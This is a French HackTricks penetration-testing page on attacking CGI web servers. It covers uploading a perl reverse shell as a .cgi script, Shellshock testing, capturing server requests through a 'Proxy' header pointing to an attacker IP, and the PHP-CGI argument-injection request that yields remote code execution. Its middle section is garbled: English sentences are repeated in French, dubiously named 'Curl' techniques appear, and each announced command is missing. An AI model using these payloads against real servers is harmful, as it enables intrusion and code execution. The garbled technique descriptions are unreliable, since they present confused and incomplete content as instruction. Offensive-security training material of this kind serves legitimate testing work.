- Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
Les scripts **CGI sont des scripts perl**, donc si vous avez compromis un serveur qui peut exécuter des scripts _**.cgi**_, vous pouvez **télécharger un shell inversé perl** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **changer l'extension** de **.pl** à **.cgi**, donner des **permissions d'exécution** \(`chmod +x`\) et **accéder** au shell inversé **depuis le navigateur web** pour l'exécuter.
Pour tester les **vulnérabilités CGI**, il est recommandé d'utiliser `nikto -C all` \(et tous les plugins\)
Bash peut également être utilisé pour exécuter des commandes transmises par des applications et c'est cette fonctionnalité qui est affectée par la vulnérabilité. Un type de commande qui peut être envoyée à Bash permet de définir des variables d'environnement. Les variables d'environnement sont des valeurs nommées dynamiques qui affectent la façon dont les processus sont exécutés sur un ordinateur. La vulnérabilité réside dans le fait qu'un **attaquant peut ajouter du code malveillant à la variable d'environnement, qui s'exécutera une fois que la variable est reçue**.
Vous pourriez **trouver** cette vulnérabilité en remarquant qu'elle utilise une **ancienne version d'Apache** et **cgi\_mod** \(avec le dossier cgi\) ou en utilisant **nikto**.
La plupart des tests sont basés sur l'affichage de quelque chose et s'attendent à ce que cette chaîne soit renvoyée dans la réponse web. Si vous pensez qu'une page peut être vulnérable, recherchez toutes les pages cgi et testez-les.
Reflected Curl is a technique that consists of sending a specially crafted request to a web application in order to reflect back the same request to the user. This technique is commonly used to perform XSS attacks.
Curl réfléchi est une technique qui consiste à envoyer une requête spécialement conçue à une application web afin de renvoyer la même requête à l'utilisateur. Cette technique est couramment utilisée pour effectuer des attaques XSS.
To perform a Reflected Curl attack, you can use the following command:
Pour effectuer une attaque Curl réfléchi, vous pouvez utiliser la commande suivante :
Blind Curl is a technique that consists of sending a specially crafted request to a web application in order to trigger a DNS lookup on a domain controlled by the attacker. This technique is commonly used to perform SSRF attacks.
Curl aveugle est une technique qui consiste à envoyer une requête spécialement conçue à une application web afin de déclencher une recherche DNS sur un domaine contrôlé par l'attaquant. Cette technique est couramment utilisée pour effectuer des attaques SSRF.
To perform a Blind Curl attack, you can use the following command:
Pour effectuer une attaque Curl aveugle, vous pouvez utiliser la commande suivante :
Out-of-Band Curl is a technique that consists of sending a specially crafted request to a web application in order to trigger an external system to perform an action on behalf of the attacker. This technique is commonly used to perform XXE attacks.
Curl hors bande est une technique qui consiste à envoyer une requête spécialement conçue à une application web afin de déclencher un système externe pour effectuer une action au nom de l'attaquant. Cette technique est couramment utilisée pour effectuer des attaques XXE.
To perform an Out-of-Band Curl attack, you can use the following command:
Pour effectuer une attaque Curl hors bande, vous pouvez utiliser la commande suivante :
Shellsocker est un outil qui permet de tester si un serveur est vulnérable à la faille Shellshock. Il envoie des requêtes HTTP avec des en-têtes User-Agent malveillants pour déclencher l'exécution de commandes arbitraires sur le serveur cible. Cet outil peut être utilisé pour tester la vulnérabilité de serveurs web, de serveurs de messagerie et d'autres services qui utilisent des scripts CGI.
Comme la variable HTTP\_PROXY peut être utilisée par le serveur Web. Essayez d'envoyer un **en-tête** contenant: "**Proxy: <IP\_attaquant>:<PORT>**" et si le serveur effectue une requête pendant la session. Vous pourrez capturer chaque requête effectuée par le serveur.
Essentiellement, si cgi est actif et que php est "ancien" \(<5.3.12 / < 5.4.2\), vous pouvez exécuter du code.
Pour exploiter cette vulnérabilité, vous devez accéder à un fichier PHP du serveur Web sans envoyer de paramètres \(surtout sans envoyer le caractère "="\).
Ensuite, pour tester cette vulnérabilité, vous pouvez accéder par exemple à `/index.php?-s` \(notez le `-s`\), et le **code source de l'application apparaîtra dans la réponse**.
Ensuite, pour obtenir **RCE**, vous pouvez envoyer cette requête spéciale: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` et le **code PHP** à exécuter dans le **corps de la requête**.
**Plus d'informations sur la vulnérabilité et les exploits possibles:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**Exemple de CTF Writeup**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
- Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.